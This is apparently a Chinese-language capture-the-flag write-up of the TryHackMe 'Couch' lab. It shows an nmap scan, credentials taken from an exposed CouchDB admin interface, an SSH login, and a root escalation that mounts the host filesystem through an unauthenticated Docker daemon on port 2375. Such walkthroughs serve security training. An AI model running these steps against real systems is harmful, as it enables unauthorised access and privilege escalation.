TryHackMe-Couch

Couch

入侵以基于 JSON 的文档格式收集和存储数据的易受攻击的数据库服务器.


做点简单题放松放松

端口扫描

循例 nmap 扫:

nmap -sV 10.10.83.34 -p 1-10000 -T5

TryHackMe-Couch_第1张图片

CouchDB

百度找couchdb相关文章:

TryHackMe-Couch_第2张图片

访问/_utils

TryHackMe-Couch_第3张图片

在secret中发现了一组凭据

TryHackMe-Couch_第4张图片

利用这组凭据尝试登录ssh

TryHackMe-Couch_第5张图片

Docker 守护程序

在atena的家目录下发现发现.bash_history文件有东西:

TryHackMe-Couch_第6张图片

使用ss命令查看到内网确实开了2375,通过bash_history我们可以确定这是docker daemon

Docker利用

docker -H 127.0.0.1:2375 images

发现一个alpine

docker -H 127.0.0.1:2375 run -v /:/tmp -it alpine

挂载主机根,root.txt在/tmp/root/root.txt

TryHackMe-Couch_第7张图片

你可能感兴趣的:(渗透测试,docker,web安全,linux,couchdb)